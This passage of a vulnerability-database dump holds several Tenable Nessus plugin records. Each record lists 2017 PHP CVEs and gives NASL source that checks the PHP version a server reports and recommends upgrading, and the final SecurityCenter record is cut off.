compilation. An unauthenticated, remote attacker can\n exploit this to execute arbitrary code. (CVE-2017-9226)\n\n - An out-of-bounds read error exists in Oniguruma in the\n mbc_enc_len() function within file utf8.c. An\n unauthenticated, remote attacker can exploit this to\n disclose memory contents or crash a process linked to\n the library. (CVE-2017-9227)\n\n - An out-of-bounds write error exists in Oniguruma in the\n bitset_set_range() function during regular expression\n compilation. An unauthenticated, remote attacker can\n exploit this to execute arbitrary code. (CVE-2017-9228)\n\n - An invalid pointer deference flaw exists in Oniguruma\n in the left_adjust_char_head() function within file\n regexec.c during regular expression compilation. An\n unauthenticated, remote attacker can exploit this to\n crash a process linked to the library, resulting in a\n denial of service condition. (CVE-2017-9229)\n\n - A flaw exists in OpenSSL in the EVP_SealInit() function\n within file crypto/evp/p_seal.c due to returning an\n undocumented value of '-1'. An unauthenticated, remote\n attacker can exploit this to cause an unspecified\n impact. (CVE-2017-11144)\n\n - An out-of-bounds read error exists in PHP in the\n php_parse_date() function within file\n ext/date/lib/parse_date.c. An unauthenticated, remote\n attacker can exploit this to disclose memory contents or\n cause a denial of service condition. (CVE-2017-11145)\n\n - A stack-based buffer overflow condition exists in PHP\n in the msgfmt_parse_message() function due to improper\n validation of user-supplied input when parsing locale.\n An unauthenticated, remote attacker can exploit this to\n cause a denial of service condition or the execution of\n arbitrary code. (CVE-2017-11362)\n\n - An off-by-one overflow condition exists in PHP in the\n INI parsing API, specifically in the zend_ini_do_op()\n function within file Zend/zend_ini_parser.c, due to\n improper validation of user-supplied input. An\n unauthenticated, remote attacker can exploit this to\n cause a denial of service condition or the execution of\n arbitrary code. (CVE-2017-11628)\n\n - An out-of-bounds read error exists in PHP in the\n finish_nested_data() function within file\n ext/standard/var_unserializer.re. An unauthenticated,\n remote attacker can exploit this to disclose memory\n contents or cause a denial of service condition.\n (CVE-2017-12933)\n\n - A use-after-free error exists in PHP in the\n zval_get_type() function within file\n ext/standard/var_unserializer.c. An unauthenticated,\n remote attacker can exploit this to execute arbitrary\n code. (CVE-2017-12934)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-7.php#7.1.7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 7.1.7 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-12933\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nvcf::php::initialize();\n\nport = get_http_port(default:80, php:TRUE);\n\napp_info = vcf::php::get_app_info(port:port);\n\nconstraints = [\n { \"min_version\" : \"7.1.0alpha0\", \"fixed_version\" : \"7.1.7\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:15:48", "description": "According to its banner, the version of PHP running on the remote web server is 7.0.x prior to 7.0.21. It is, therefore, affected by the following vulnerabilities :\n\n - An out-of-bounds read error exists in the PCRE library in the compile_bracket_matchingpath() function within file pcre_jit_compile.c. An unauthenticated, remote attacker can exploit this, via a specially crafted regular expression, to crash a process linked to the library, resulting in a denial of service condition.\n (CVE-2017-6004)\n\n - An out-of-bounds read error exists in the GD Graphics Library (LibGD) in the gdImageCreateFromGifCtx() function within file gd_gif_in.c when handling a specially crafted GIF file. An unauthenticated, remote attacker can exploit this to disclose sensitive memory contents or crash a process linked to the library.\n (CVE-2017-7890)\n\n - An out-of-bounds read error exists in Oniguruma in the match_at() function within file regexec.c. An unauthenticated, remote attacker can exploit this to disclose sensitive memory contents or crash a process linked to the library. (CVE-2017-9224)\n\n - An out-of-bounds write error exists in Oniguruma in the next_state_val() function during regular expression compilation. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-9226)\n\n - An out-of-bounds read error exists in Oniguruma in the mbc_enc_len() function within file utf8.c. An unauthenticated, remote attacker can exploit this to disclose memory contents or crash a process linked to the library. (CVE-2017-9227)\n\n - An out-of-bounds write error exists in Oniguruma in the bitset_set_range() function during regular expression compilation. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-9228)\n\n - An invalid pointer deference flaw exists in Oniguruma in the left_adjust_char_head() function within file regexec.c during regular expression compilation. An unauthenticated, remote attacker can exploit this to crash a process linked to the library, resulting in a denial of service condition. (CVE-2017-9229)\n\n - A flaw exists in OpenSSL in the EVP_SealInit() function within file crypto/evp/p_seal.c due to returning an undocumented value of '-1'. An unauthenticated, remote attacker can exploit this to cause an unspecified impact. (CVE-2017-11144)\n\n - An out-of-bounds read error exists in PHP in the php_parse_date() function within file ext/date/lib/parse_date.c. An unauthenticated, remote attacker can exploit this to disclose memory contents or cause a denial of service condition. (CVE-2017-11145)\n\n - A stack-based buffer overflow condition exists in PHP in the msgfmt_parse_message() function due to improper validation of user-supplied input when parsing locale.\n An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-11362)\n\n - An off-by-one overflow condition exists in PHP in the INI parsing API, specifically in the zend_ini_do_op() function within file Zend/zend_ini_parser.c, due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-11628)\n\n - An out-of-bounds read error exists in PHP in the finish_nested_data() function within file ext/standard/var_unserializer.re. An unauthenticated, remote attacker can exploit this to disclose memory contents or cause a denial of service condition.\n (CVE-2017-12933)\n\n - A use-after-free error exists in PHP in the zval_get_type() function within file ext/standard/var_unserializer.c. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-12934)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2017-07-13T00:00:00", "type": "nessus", "title": "PHP 7.0.x < 7.0.21 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11362", "CVE-2017-11628", "CVE-2017-12933", "CVE-2017-12934", "CVE-2017-6004", "CVE-2017-7890", "CVE-2017-9224", "CVE-2017-9226", "CVE-2017-9227", "CVE-2017-9228", "CVE-2017-9229"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_7_0_21.NASL", "href": "https://www.tenable.com/plugins/nessus/101526", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101526);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2017-6004\",\n \"CVE-2017-7890\",\n \"CVE-2017-9224\",\n \"CVE-2017-9226\",\n \"CVE-2017-9227\",\n \"CVE-2017-9228\",\n \"CVE-2017-9229\",\n \"CVE-2017-11144\",\n \"CVE-2017-11145\",\n \"CVE-2017-11362\",\n \"CVE-2017-11628\",\n \"CVE-2017-12933\",\n \"CVE-2017-12934\"\n );\n script_bugtraq_id(\n 96295,\n 99489,\n 99490,\n 99492,\n 99501,\n 100428\n );\n\n script_name(english:\"PHP 7.0.x < 7.0.21 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of PHP running on the remote web server is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP running on the remote web\nserver is 7.0.x prior to 7.0.21. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - An out-of-bounds read error exists in the PCRE library\n in the compile_bracket_matchingpath() function within\n file pcre_jit_compile.c. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n regular expression, to crash a process linked to the\n library, resulting in a denial of service condition.\n (CVE-2017-6004)\n\n - An out-of-bounds read error exists in the GD Graphics\n Library (LibGD) in the gdImageCreateFromGifCtx()\n function within file gd_gif_in.c when handling a\n specially crafted GIF file. An unauthenticated, remote\n attacker can exploit this to disclose sensitive memory\n contents or crash a process linked to the library.\n (CVE-2017-7890)\n\n - An out-of-bounds read error exists in Oniguruma in the\n match_at() function within file regexec.c. An\n unauthenticated, remote attacker can exploit this to\n disclose sensitive memory contents or crash a process\n linked to the library. (CVE-2017-9224)\n\n - An out-of-bounds write error exists in Oniguruma in the\n next_state_val() function during regular expression\n compilation. An unauthenticated, remote attacker can\n exploit this to execute arbitrary code. (CVE-2017-9226)\n\n - An out-of-bounds read error exists in Oniguruma in the\n mbc_enc_len() function within file utf8.c. An\n unauthenticated, remote attacker can exploit this to\n disclose memory contents or crash a process linked to\n the library. (CVE-2017-9227)\n\n - An out-of-bounds write error exists in Oniguruma in the\n bitset_set_range() function during regular expression\n compilation. An unauthenticated, remote attacker can\n exploit this to execute arbitrary code. (CVE-2017-9228)\n\n - An invalid pointer deference flaw exists in Oniguruma\n in the left_adjust_char_head() function within file\n regexec.c during regular expression compilation. An\n unauthenticated, remote attacker can exploit this to\n crash a process linked to the library, resulting in a\n denial of service condition. (CVE-2017-9229)\n\n - A flaw exists in OpenSSL in the EVP_SealInit() function\n within file crypto/evp/p_seal.c due to returning an\n undocumented value of '-1'. An unauthenticated, remote\n attacker can exploit this to cause an unspecified\n impact. (CVE-2017-11144)\n\n - An out-of-bounds read error exists in PHP in the\n php_parse_date() function within file\n ext/date/lib/parse_date.c. An unauthenticated, remote\n attacker can exploit this to disclose memory contents or\n cause a denial of service condition. (CVE-2017-11145)\n\n - A stack-based buffer overflow condition exists in PHP\n in the msgfmt_parse_message() function due to improper\n validation of user-supplied input when parsing locale.\n An unauthenticated, remote attacker can exploit this to\n cause a denial of service condition or the execution of\n arbitrary code. (CVE-2017-11362)\n\n - An off-by-one overflow condition exists in PHP in the\n INI parsing API, specifically in the zend_ini_do_op()\n function within file Zend/zend_ini_parser.c, due to\n improper validation of user-supplied input. An\n unauthenticated, remote attacker can exploit this to\n cause a denial of service condition or the execution of\n arbitrary code. (CVE-2017-11628)\n\n - An out-of-bounds read error exists in PHP in the\n finish_nested_data() function within file\n ext/standard/var_unserializer.re. An unauthenticated,\n remote attacker can exploit this to disclose memory\n contents or cause a denial of service condition.\n (CVE-2017-12933)\n\n - A use-after-free error exists in PHP in the\n zval_get_type() function within file\n ext/standard/var_unserializer.c. An unauthenticated,\n remote attacker can exploit this to execute arbitrary\n code. (CVE-2017-12934)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-7.php#7.0.21\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 7.0.21 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-12933\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nvcf::php::initialize();\n\nport = get_http_port(default:80, php:TRUE);\n\napp_info = vcf::php::get_app_info(port:port);\n\nconstraints = [\n { \"min_version\" : \"7.0.0alpha0\", \"fixed_version\" : \"7.0.21\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:21:49", "description": "According to its banner, the version of PHP running on the remote web server is 5.6.x prior to 5.6.31. It is, therefore, affected by the following vulnerabilities :\n\n - An out-of-bounds read error exists in the PCRE library in the compile_bracket_matchingpath() function within file pcre_jit_compile.c. An unauthenticated, remote attacker can exploit this, via a specially crafted regular expression, to crash a process linked to the library, resulting in a denial of service condition.\n (CVE-2017-6004)\n\n - An out-of-bounds read error exists in the GD Graphics Library (LibGD) in the gdImageCreateFromGifCtx() function within file gd_gif_in.c when handling a specially crafted GIF file. An unauthenticated, remote attacker can exploit this to disclose sensitive memory contents or crash a process linked to the library.\n (CVE-2017-7890)\n\n - An out-of-bounds read error exists in Oniguruma in the match_at() function within file regexec.c. An unauthenticated, remote attacker can exploit this to disclose sensitive memory contents or crash a process linked to the library. (CVE-2017-9224)\n\n - An out-of-bounds write error exists in Oniguruma in the next_state_val() function during regular expression compilation. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-9226)\n\n - An out-of-bounds read error exists in Oniguruma in the mbc_enc_len() function within file utf8.c. An unauthenticated, remote attacker can exploit this to disclose memory contents or crash a process linked to the library. (CVE-2017-9227)\n\n - An out-of-bounds write error exists in Oniguruma in the bitset_set_range() function during regular expression compilation. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-9228)\n\n - An invalid pointer deference flaw exists in Oniguruma in the left_adjust_char_head() function within file regexec.c during regular expression compilation. An unauthenticated, remote attacker can exploit this to crash a process linked to the library, resulting in a denial of service condition. (CVE-2017-9229)\n\n - A denial of service condition exists in PHP when handling overlarge POST requests. An unauthenticated, remote attacker can exploit this to exhaust available CPU resources. (CVE-2017-11142)\n\n - An extended invalid free error exists in PHP in the php_wddx_push_element() function within file ext/wddx/wddx.c when parsing empty boolean tags.\n An unauthenticated, remote attacker can exploit this to cause a denial of service condition. (CVE-2017-11143)\n\n - A flaw exists in OpenSSL in the EVP_SealInit() function within file crypto/evp/p_seal.c due to returning an undocumented value of '-1'. An unauthenticated, remote attacker can exploit this to cause an unspecified impact. (CVE-2017-11144)\n\n - An out-of-bounds read error exists in PHP in the php_parse_date() function within file ext/date/lib/parse_date.c. An unauthenticated, remote attacker can exploit this to disclose memory contents or cause a denial of service condition.\n (CVE-2017-11145)\n\n - An out-of-bounds read error exists in PHP in the finish_nested_data() function within file ext/standard/var_unserializer.re. An unauthenticated, remote attacker can exploit this to disclose memory contents or cause a denial of service condition.\n\n - An off-by-one overflow condition exists in PHP in the INI parsing API, specifically in the zend_ini_do_op() function within file Zend/zend_ini_parser.y, due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the execution of arbitrary code.\n\n - A Heap buffer overread flaw in finish_nested_data while unserializing untrusted data could lead to an unspecified impact on the integrity of PHP.\n (CVE-2017-12933)\n\n - A stack-based buffer overflow in the zend_ini_do_op() function in Zend/zend_ini_parser.c could cause a denial of service or potentially allow executing code.\n (CVE-2017-11628)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2017-07-13T00:00:00", "type": "nessus", "title": "PHP 5.6.x < 5.6.31 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11142", "CVE-2017-11143", "CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11628", "CVE-2017-12933", "CVE-2017-6004", "CVE-2017-7890", "CVE-2017-9224", "CVE-2017-9226", "CVE-2017-9227", "CVE-2017-9228", "CVE-2017-9229"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_6_31.NASL", "href": "https://www.tenable.com/plugins/nessus/101525", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101525);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2017-6004\",\n \"CVE-2017-7890\",\n \"CVE-2017-9224\",\n \"CVE-2017-9226\",\n \"CVE-2017-9227\",\n \"CVE-2017-9228\",\n \"CVE-2017-9229\",\n \"CVE-2017-11142\",\n \"CVE-2017-11143\",\n \"CVE-2017-11144\",\n \"CVE-2017-11145\",\n \"CVE-2017-11628\",\n \"CVE-2017-12933\"\n );\n script_bugtraq_id(\n 96295,\n 99489,\n 99490,\n 99492,\n 99501,\n 99550,\n 99553,\n 99601,\n 99605,\n 100320,\n 100538,\n 101244\n );\n\n script_name(english:\"PHP 5.6.x < 5.6.31 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of PHP running on the remote web server is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP running on the remote web\nserver is 5.6.x prior to 5.6.31. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - An out-of-bounds read error exists in the PCRE library\n in the compile_bracket_matchingpath() function within\n file pcre_jit_compile.c. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n regular expression, to crash a process linked to the\n library, resulting in a denial of service condition.\n (CVE-2017-6004)\n\n - An out-of-bounds read error exists in the GD Graphics\n Library (LibGD) in the gdImageCreateFromGifCtx()\n function within file gd_gif_in.c when handling a\n specially crafted GIF file. An unauthenticated, remote\n attacker can exploit this to disclose sensitive memory\n contents or crash a process linked to the library.\n (CVE-2017-7890)\n\n - An out-of-bounds read error exists in Oniguruma in the\n match_at() function within file regexec.c. An\n unauthenticated, remote attacker can exploit this to\n disclose sensitive memory contents or crash a process\n linked to the library. (CVE-2017-9224)\n\n - An out-of-bounds write error exists in Oniguruma in the\n next_state_val() function during regular expression\n compilation. An unauthenticated, remote attacker can\n exploit this to execute arbitrary code. (CVE-2017-9226)\n\n - An out-of-bounds read error exists in Oniguruma in the\n mbc_enc_len() function within file utf8.c. An\n unauthenticated, remote attacker can exploit this to\n disclose memory contents or crash a process linked to\n the library. (CVE-2017-9227)\n\n - An out-of-bounds write error exists in Oniguruma in the\n bitset_set_range() function during regular expression\n compilation. An unauthenticated, remote attacker can\n exploit this to execute arbitrary code. (CVE-2017-9228)\n\n - An invalid pointer deference flaw exists in Oniguruma\n in the left_adjust_char_head() function within file\n regexec.c during regular expression compilation. An\n unauthenticated, remote attacker can exploit this to\n crash a process linked to the library, resulting in a\n denial of service condition. (CVE-2017-9229)\n\n - A denial of service condition exists in PHP when\n handling overlarge POST requests. An unauthenticated,\n remote attacker can exploit this to exhaust available\n CPU resources. (CVE-2017-11142)\n\n - An extended invalid free error exists in PHP in the\n php_wddx_push_element() function within file\n ext/wddx/wddx.c when parsing empty boolean tags.\n An unauthenticated, remote attacker can exploit this to\n cause a denial of service condition. (CVE-2017-11143)\n\n - A flaw exists in OpenSSL in the EVP_SealInit() function\n within file crypto/evp/p_seal.c due to returning an\n undocumented value of '-1'. An unauthenticated, remote\n attacker can exploit this to cause an unspecified\n impact. (CVE-2017-11144)\n\n - An out-of-bounds read error exists in PHP in the\n php_parse_date() function within file\n ext/date/lib/parse_date.c. An unauthenticated, remote\n attacker can exploit this to disclose memory contents or\n cause a denial of service condition.\n (CVE-2017-11145)\n\n - An out-of-bounds read error exists in PHP in the\n finish_nested_data() function within file\n ext/standard/var_unserializer.re. An unauthenticated,\n remote attacker can exploit this to disclose memory\n contents or cause a denial of service condition.\n\n - An off-by-one overflow condition exists in PHP in the\n INI parsing API, specifically in the zend_ini_do_op()\n function within file Zend/zend_ini_parser.y, due to\n improper validation of user-supplied input. An\n unauthenticated, remote attacker can exploit this to\n cause a denial of service condition or the execution of\n arbitrary code.\n\n - A Heap buffer overread flaw in finish_nested_data\n while unserializing untrusted data could lead to an\n unspecified impact on the integrity of PHP.\n (CVE-2017-12933)\n\n - A stack-based buffer overflow in the zend_ini_do_op()\n function in Zend/zend_ini_parser.c could cause a denial\n of service or potentially allow executing code.\n (CVE-2017-11628)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/ChangeLog-5.php#5.6.31\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 5.6.31 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-9224\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^5(\\.6)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^5\\.6\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 5.6.x\", port);\n\nfix = \"5.6.31\";\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:22:57", "description": "The Tenable SecurityCenter application installed on the remote host is missing a security patch. It is, therefore, affected by multiple vulnerabilities in the bundled version of PHP :\n\n - An out-of-bounds read error exists in the PCRE library in the compile_bracket_matchingpath() function within file pcre_jit_compile.c. An unauthenticated, remote attacker can exploit this, via a specially crafted regular expression, to crash a process linked to the library, resulting in a denial of service condition.\n (CVE-2017-6004)\n\n - An out-of-bounds read error exists in the GD Graphics Library (LibGD) in the gdImageCreateFromGifCtx() function within file gd_gif_in.c when handling a specially crafted GIF file. An unauthenticated, remote attacker can exploit this to disclose sensitive memory contents or crash a process linked to the library.\n (CVE-2017-7890)\n\n - An out-of-bounds read error exists in Oniguruma in the match_at() function within file regexec.c. An unauthenticated, remote attacker can exploit this to disclose sensitive memory contents or crash a process linked to the library. (CVE-2017-9224)\n\n - An out-of-bounds write error exists in Oniguruma in the next_state_val() function during regular expression compilation. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-9226)\n\n - An out-of-bounds read error exists in Oniguruma in the mbc_enc_len() function within file utf8.c. An unauthenticated, remote attacker can exploit this to disclose memory contents or crash a process linked to the library. (CVE-2017-9227)\n\n - An out-of-bounds write error exists in Oniguruma in the bitset_set_range() function during regular expression compilation. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2017-9228)\n\n - An invalid pointer deference flaw exists in Oniguruma in the left_adjust_char_head() function within file regexec.c during regular expression compilation. An unauthenticated, remote attacker can exploit this to crash a process linked to the library, resulting in a denial of service condition. (CVE-2017-9229)\n\n - A denial of service condition exists in PHP when handling overlarge POST requests. An unauthenticated, remote attacker can exploit this to exhaust available CPU resources. (CVE-2017-11142)\n\n - An extended invalid free error exists in PHP in the php_wddx_push_element() function within file ext/wddx/wddx.c when parsing empty boolean tags.\n An unauthenticated, remote attacker can exploit this to cause a denial of service condition. (CVE-2017-11143)\n\n - A flaw exists in OpenSSL in the EVP_SealInit() function within file crypto/evp/p_seal.c due to returning an undocumented value of '-1'. An unauthenticated, remote attacker can exploit this to cause an unspecified impact. (CVE-2017-11144)\n\n - An out-of-bounds read error exists in PHP in the php_parse_date() function within file ext/date/lib/parse_date.c. An unauthenticated, remote attacker can exploit this to disclose memory contents or cause a denial of service condition.\n (CVE-2017-11145)\n\n - An out-of-bounds read error exists in PHP in the finish_nested_data() function within file ext/standard/var_unserializer.re. An unauthenticated, remote attacker can exploit this to disclose memory contents or cause a denial of service condition.\n\n - An off-by-one overflow condition exists in PHP in the INI parsing API, specifically in the zend_ini_do_op() function within file Zend/zend_ini_parser.y, due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the execution of arbitrary code.\n\n - A Heap buffer overread flaw in finish_nested_data while unserializing untrusted data could lead to an unspecified impact on the integrity of PHP.\n (CVE-2017-12933)\n\n - A stack-based buffer overflow in the zend_ini_do_op() function in Zend/zend_ini_parser.c could cause a denial of service or potentially allow executing code.\n (CVE-2017-11628)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2017-09-12T00:00:00", "type": "nessus", "title": "Tenable SecurityCenter PHP < 5.6.31 Multiple Vulnerabilities (TNS-2017-12", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11142", "CVE-2017-11143", "CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11628", "CVE-2017-12933", "CVE-2017-6004", "CVE-2017-7890", "CVE-2017-9224", "CVE-2017-9226", "CVE-2017-9227", "CVE-2017-9228", "CVE-2017-9229"], "modified": "2020-10-09T00:00:00", "cpe": ["cpe:/a:tenable:securitycenter"], "id": "SECURITYCENTER_PHP_5_6_31.NASL", "href": "https://www.tenable.com/plugins/nessus/103121", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103121);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/09\");\n\n script_cve_id(\n \"CVE-2017-6004\",\n \"CVE-2017-7890\",\n \"CVE-2017-9224\",\n \"CVE-2017-9226\",\n \"CVE-2017-9227\",\n \"CVE-2017-9228\",\n \"CVE-2017-9229\",\n \"CVE-2017-11142\",\n \"CVE-2017-11143\",\n \"CVE-2017-11144\",\n \"CVE-2017-11145\",\n \"CVE-2017-11628\",\n \"CVE-2017-12933\"\n );\n script_bugtraq_id(\n 96295,\n 99489,\n 99490,\n 99492,\n 99501,\n 99550,\n 99553,\n 99601,\n 99605,\n 100320,\n 100538,\n 101244\n );\n\n script_name(english:\"Tenable SecurityCenter PHP < 5.6.31 Multiple Vulnerabilities (TNS-2017-12\");\n script_summary(english:\"Checks the version of PHP in SecurityCenter.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Tenable SecurityCenter application on the remote host contains 